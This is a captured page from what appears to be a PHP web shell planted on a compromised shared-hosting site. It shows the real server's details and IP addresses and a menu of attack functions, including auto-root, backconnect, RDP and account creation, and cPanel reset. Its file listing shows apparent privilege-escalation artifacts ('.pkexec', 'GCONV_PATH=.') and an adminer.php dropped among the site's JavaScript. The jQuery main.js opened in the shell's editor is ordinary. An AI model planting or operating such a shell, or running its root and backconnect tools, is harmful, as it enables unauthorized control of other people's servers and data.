Linux server64.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
LiteSpeed
: 198.54.115.120 | : 216.73.216.178
Cant Read [ /etc/named.conf ]
5.6.40
midwsfoc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
midwsfoc /
swift-xpc.com /
assets /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
animated.headline.js
5.4
KB
-rw-r--r--
bootstrap.min.js
47.8
KB
-rw-r--r--
contact.js
2.95
KB
-rw-r--r--
jquery.ajaxchimp.min.js
4.71
KB
-rw-r--r--
jquery.form.js
40.13
KB
-rw-r--r--
jquery.magnific-popup.js
19.74
KB
-rw-r--r--
jquery.nice-select.min.js
2.87
KB
-rw-r--r--
jquery.paroller.min.js
3.45
KB
-rw-r--r--
jquery.slicknav.min.js
8.22
KB
-rw-r--r--
jquery.sticky.js
9.85
KB
-rw-r--r--
jquery.validate.min.js
20.57
KB
-rw-r--r--
mail-script.js
1.2
KB
-rw-r--r--
main.js
5.92
KB
-rw-r--r--
one-page-nav-min.js
3.16
KB
-rw-r--r--
owl.carousel.min.js
41.76
KB
-rw-r--r--
plugins.js
760
B
-rw-r--r--
popper.min.js
18.74
KB
-rw-r--r--
price-range.js
81.15
KB
-rw-r--r--
slick.min.js
41.86
KB
-rw-r--r--
wow.min.js
8.22
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : main.js
(function ($) { "use strict" /* 1. Proloder */ $(window).on('load', function () { $('#preloader-active').delay(450).fadeOut('slow'); $('body').delay(450).css({ 'overflow': 'visible' }); }); /* 2. sticky And Scroll UP */ $(window).on('scroll', function () { var scroll = $(window).scrollTop(); if (scroll < 400) { $(".header-sticky").removeClass("sticky-bar"); $('#back-top').fadeOut(500); } else { $(".header-sticky").addClass("sticky-bar"); $('#back-top').fadeIn(500); } }); // Scroll Up $('#back-top a').on("click", function () { $('body,html').animate({ scrollTop: 0 }, 800); return false; }); /* 3. slick Nav */ // mobile_menu var menu = $('ul#navigation'); if(menu.length){ menu.slicknav({ prependTo: ".mobile_menu", closedSymbol: '+', openedSymbol:'-' }); }; /* 4. MainSlider-1 */ // h1-hero-active function mainSlider() { var BasicSlider = $('.slider-active'); BasicSlider.on('init', function (e, slick) { var $firstAnimatingElements = $('.single-slider:first-child').find('[data-animation]'); doAnimations($firstAnimatingElements); }); BasicSlider.on('beforeChange', function (e, slick, currentSlide, nextSlide) { var $animatingElements = $('.single-slider[data-slick-index="' + nextSlide + '"]').find('[data-animation]'); doAnimations($animatingElements); }); BasicSlider.slick({ autoplay: false, autoplaySpeed: 4000, dots: false, fade: true, arrows: false, prevArrow: '<button type="button" class="slick-prev"><i class="ti-angle-left"></i></button>', nextArrow: '<button type="button" class="slick-next"><i class="ti-angle-right"></i></button>', responsive: [{ breakpoint: 1024, settings: { slidesToShow: 1, slidesToScroll: 1, infinite: true, } }, { breakpoint: 991, settings: { slidesToShow: 1, slidesToScroll: 1, arrows: false } }, { breakpoint: 767, settings: { slidesToShow: 1, slidesToScroll: 1, arrows: false } } ] }); function doAnimations(elements) { var animationEndEvents = 'webkitAnimationEnd mozAnimationEnd MSAnimationEnd oanimationend animationend'; elements.each(function () { var $this = $(this); var $animationDelay = $this.data('delay'); var $animationType = 'animated ' + $this.data('animation'); $this.css({ 'animation-delay': $animationDelay, '-webkit-animation-delay': $animationDelay }); $this.addClass($animationType).one(animationEndEvents, function () { $this.removeClass($animationType); }); }); } } mainSlider(); // blog-activ $('.blog-active').slick({ dots:false, infinite: true, speed: 300, arrows: true, slidesToShow: 3, prevArrow:'<button type="button" class="slick-prev"><i class="ti-angle-left"></i></button>', nextArrow:'<button type="button" class="slick-next"><i class="ti-angle-right"></i></button>', slidesToScroll: 1, responsive: [ { breakpoint: 1200, settings: { slidesToShow: 2, slidesToScroll: 1, infinite: true, dots: false, } }, { breakpoint: 992, settings: { slidesToShow: 2, slidesToScroll: 1 } }, { breakpoint: 700, settings: { arrows: false, slidesToShow: 1, slidesToScroll: 1 } }, { breakpoint: 480, settings: { arrows: false, slidesToShow: 1, slidesToScroll: 1 } } ] }); /* 4. Testimonial Active*/ var testimonial = $('.h1-testimonial-active'); if(testimonial.length){ testimonial.slick({ dots: false, infinite: true, speed: 1000, autoplay:false, arrows: true, prevArrow: '<button type="button" class="slick-prev"><i class="ti-angle-left"></i></button>', nextArrow: '<button type="button" class="slick-next"><i class="ti-angle-right"></i></button>', slidesToShow: 1, slidesToScroll: 1, responsive: [ { breakpoint: 1024, settings: { slidesToShow: 1, slidesToScroll: 1, infinite: true, dots: false, arrow:false } }, { breakpoint: 600, settings: { slidesToShow: 1, slidesToScroll: 1, arrows:false } }, { breakpoint: 480, settings: { slidesToShow: 1, slidesToScroll: 1, arrows:false, } } ] }); } /* 6. Nice Selectorp */ var nice_Select = $('select'); if(nice_Select.length){ nice_Select.niceSelect(); } /* 7. data-background */ $("[data-background]").each(function () { $(this).css("background-image", "url(" + $(this).attr("data-background") + ")") }); /* 10. WOW active */ new WOW().init(); // 11. ---- Mailchimp js --------// function mailChimp() { $('#mc_embed_signup').find('form').ajaxChimp(); } mailChimp(); // 12 Pop Up Img var popUp = $('.single_gallery_part, .img-pop-up'); if(popUp.length){ popUp.magnificPopup({ type: 'image', gallery:{ enabled:true } }); } })(jQuery);
Close